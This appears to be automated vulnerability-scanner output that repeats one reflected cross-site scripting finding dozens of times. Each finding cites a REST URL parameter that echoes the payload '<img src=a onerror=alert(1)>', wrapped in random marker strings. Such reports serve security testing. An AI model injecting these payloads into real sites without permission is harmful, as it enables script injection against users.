This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25 was submitted in the REST URL parameter 4. This input was echoed as 2b456<img src=a onerror=alert(1)>3ef34cddc25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa was submitted in the REST URL parameter 4. This input was echoed as 26bb8<img src=a onerror=alert(1)>4f418de10fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2 was submitted in the REST URL parameter 4. This input was echoed as c5e3e<img src=a onerror=alert(1)>af792a1d8d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10 was submitted in the REST URL parameter 4. This input was echoed as c0add<img src=a onerror=alert(1)>3a458bffe10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5 was submitted in the REST URL parameter 4. This input was echoed as eddcd<img src=a onerror=alert(1)>36a4f7cabf5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0 was submitted in the REST URL parameter 4. This input was echoed as d7c78<img src=a onerror=alert(1)>f21d66732f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2 was submitted in the REST URL parameter 4. This input was echoed as 2d290<img src=a onerror=alert(1)>5ddd19d0da2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5 was submitted in the REST URL parameter 4. This input was echoed as d1998<img src=a onerror=alert(1)>528b4e0b9e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e was submitted in the REST URL parameter 4. This input was echoed as 474f1<img src=a onerror=alert(1)>5ce3405dd8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6 was submitted in the REST URL parameter 4. This input was echoed as d5728<img src=a onerror=alert(1)>b0a30417ea6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103 was submitted in the REST URL parameter 4. This input was echoed as a76eb<img src=a onerror=alert(1)>4c782d0a103 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630 was submitted in the REST URL parameter 4. This input was echoed as 289bb<img src=a onerror=alert(1)>26baf769630 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552 was submitted in the REST URL parameter 4. This input was echoed as de255<img src=a onerror=alert(1)>c346dbd6552 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77 was submitted in the REST URL parameter 4. This input was echoed as c283f<img src=a onerror=alert(1)>36eb41daa77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51 was submitted in the REST URL parameter 4. This input was echoed as c6ee0<img src=a onerror=alert(1)>eee01c75e51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73 was submitted in the REST URL parameter 4. This input was echoed as 42fb2<img src=a onerror=alert(1)>9bfa309cd73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d was submitted in the REST URL parameter 4. This input was echoed as 5af61<img src=a onerror=alert(1)>de04cd3978d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac was submitted in the REST URL parameter 4. This input was echoed as 89278<img src=a onerror=alert(1)>7f5a74568ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54 was submitted in the REST URL parameter 4. This input was echoed as 5edba<img src=a onerror=alert(1)>ef68be70d54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf was submitted in the REST URL parameter 4. This input was echoed as 3981c<img src=a onerror=alert(1)>f3c6a27bcdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c was submitted in the REST URL parameter 4. This input was echoed as 2bd47<img src=a onerror=alert(1)>32ef2fcb48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6 was submitted in the REST URL parameter 4. This input was echoed as 1bec2<img src=a onerror=alert(1)>800c3098bb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef was submitted in the REST URL parameter 4. This input was echoed as bbe2e<img src=a onerror=alert(1)>4a5863699ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e was submitted in the REST URL parameter 4. This input was echoed as 4d241<img src=a onerror=alert(1)>f3192c4dd8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27 was submitted in the REST URL parameter 4. This input was echoed as 7708a<img src=a onerror=alert(1)>cea37b0dc27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6 was submitted in the REST URL parameter 4. This input was echoed as c626d<img src=a onerror=alert(1)>f8e8550aea6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892 was submitted in the REST URL parameter 4. This input was echoed as f3612<img src=a onerror=alert(1)>8e7e91e7892 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff was submitted in the REST URL parameter 4. This input was echoed as cec91<img src=a onerror=alert(1)>fe6601272ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a was submitted in the REST URL parameter 4. This input was echoed as 61b2e<img src=a onerror=alert(1)>c719197871a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988 was submitted in the REST URL parameter 4. This input was echoed as fdfd6<img src=a onerror=alert(1)>5225426e988 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8 was submitted in the REST URL parameter 4. This input was echoed as c3b86<img src=a onerror=alert(1)>2f11037b8a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad was submitted in the REST URL parameter 4. This input was echoed as 92ad0<img src=a onerror=alert(1)>67a04e9f9ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7 was submitted in the REST URL parameter 4. This input was echoed as 25c5c<img src=a onerror=alert(1)>acdf4b335e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0 was submitted in the REST URL parameter 4. This input was echoed as 1700a<img src=a onerror=alert(1)>431cdd919b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1 was submitted in the REST URL parameter 4. This input was echoed as ff769<img src=a onerror=alert(1)>4cee47844e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0 was submitted in the REST URL parameter 4. This input was echoed as 9574c<img src=a onerror=alert(1)>fefecf03ff0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c was submitted in the REST URL parameter 4. This input was echoed as 7b7b8<img src=a onerror=alert(1)>c0ef5bf553c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1 was submitted in the REST URL parameter 4. This input was echoed as cf073<img src=a onerror=alert(1)>349e06f6aa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3 was submitted in the REST URL parameter 4. This input was echoed as d3224<img src=a onerror=alert(1)>cbeb6a32bd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57e45<img%20src%3da%20onerror%3dalert(1)>886d240528f was submitted in the REST URL parameter 4. This input was echoed as 57e45<img src=a onerror=alert(1)>886d240528f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab was submitted in the REST URL parameter 4. This input was echoed as 49714<img src=a onerror=alert(1)>47a258f6aab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60 was submitted in the REST URL parameter 4. This input was echoed as 25fa5<img src=a onerror=alert(1)>0605ce3fb60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087 was submitted in the REST URL parameter 4. This input was echoed as f122e<img src=a onerror=alert(1)>8fe677fa087 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf was submitted in the REST URL parameter 4. This input was echoed as 8cd2c<img src=a onerror=alert(1)>1f8bc0e79cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56 was submitted in the REST URL parameter 4. This input was echoed as 34b5d<img src=a onerror=alert(1)>d93ebbf56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b was submitted in the REST URL parameter 4. This input was echoed as 560bb<img src=a onerror=alert(1)>62ff753761b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 44f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2 was submitted in the REST URL parameter 4. This input was echoed as 44f39<img src=a onerror=alert(1)>bcadb3209b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e was submitted in the REST URL parameter 4. This input was echoed as 71f65<img src=a onerror=alert(1)>c40a9d0d17e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0 was submitted in the REST URL parameter 4. This input was echoed as 94385<img src=a onerror=alert(1)>e4589bd16b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae was submitted in the REST URL parameter 4. This input was echoed as 56cd3<img src=a onerror=alert(1)>61afdd70dae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07 was submitted in the REST URL parameter 4. This input was echoed as 24426<img src=a onerror=alert(1)>eb76c2b7d07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538 was submitted in the REST URL parameter 4. This input was echoed as fcae1<img src=a onerror=alert(1)>20c237af538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c was submitted in the REST URL parameter 4. This input was echoed as be7d9<img src=a onerror=alert(1)>5e6ae0f073c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473 was submitted in the REST URL parameter 4. This input was echoed as 7d09f<img src=a onerror=alert(1)>4bc9fdbe473 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449 was submitted in the REST URL parameter 4. This input was echoed as 679b6<img src=a onerror=alert(1)>45652ca7449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5 was submitted in the REST URL parameter 4. This input was echoed as cb519<img src=a onerror=alert(1)>1304a011ff5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 557cd<img%20src%3da%20onerror%3dalert(1)>74814746684 was submitted in the REST URL parameter 4. This input was echoed as 557cd<img src=a onerror=alert(1)>74814746684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b was submitted in the REST URL parameter 4. This input was echoed as 97b00<img src=a onerror=alert(1)>76e1c38304b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739 was submitted in the REST URL parameter 4. This input was echoed as 8a39a<img src=a onerror=alert(1)>4a9a17b5739 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e was submitted in the REST URL parameter 4. This input was echoed as 51ab9<img src=a onerror=alert(1)>07b684bf62e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0 was submitted in the REST URL parameter 4. This input was echoed as 87f41<img src=a onerror=alert(1)>344f1a56de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67 was submitted in the REST URL parameter 4. This input was echoed as b73a8<img src=a onerror=alert(1)>a869a660e67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3 was submitted in the REST URL parameter 4. This input was echoed as 16c8f<img src=a onerror=alert(1)>ebbc796eaf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99 was submitted in the REST URL parameter 4. This input was echoed as 56b0a<img src=a onerror=alert(1)>9b1e6a14d99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1 was submitted in the REST URL parameter 4. This input was echoed as 60e50<img src=a onerror=alert(1)>105ed31e3a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a was submitted in the REST URL parameter 4. This input was echoed as 82005<img src=a onerror=alert(1)>f7417a937a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f was submitted in the REST URL parameter 4. This input was echoed as bf11a<img src=a onerror=alert(1)>b2a55de1d7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c was submitted in the REST URL parameter 4. This input was echoed as 6f66e<img src=a onerror=alert(1)>4eb36ef817c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa was submitted in the REST URL parameter 4. This input was echoed as 35fb9<img src=a onerror=alert(1)>77ca712fdaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753 was submitted in the REST URL parameter 4. This input was echoed as 8a524<img src=a onerror=alert(1)>285e07c9753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c was submitted in the REST URL parameter 4. This input was echoed as ec7f7<img src=a onerror=alert(1)>042a2b90b3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861 was submitted in the REST URL parameter 4. This input was echoed as b33c3<img src=a onerror=alert(1)>81badf9861 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb was submitted in the REST URL parameter 4. This input was echoed as 8889d<img src=a onerror=alert(1)>01d9ca41aeb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578 was submitted in the REST URL parameter 4. This input was echoed as d4936<img src=a onerror=alert(1)>a8983b2e578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38 was submitted in the REST URL parameter 4. This input was echoed as 53e9d<img src=a onerror=alert(1)>9227fd9ac38 in the application's response.
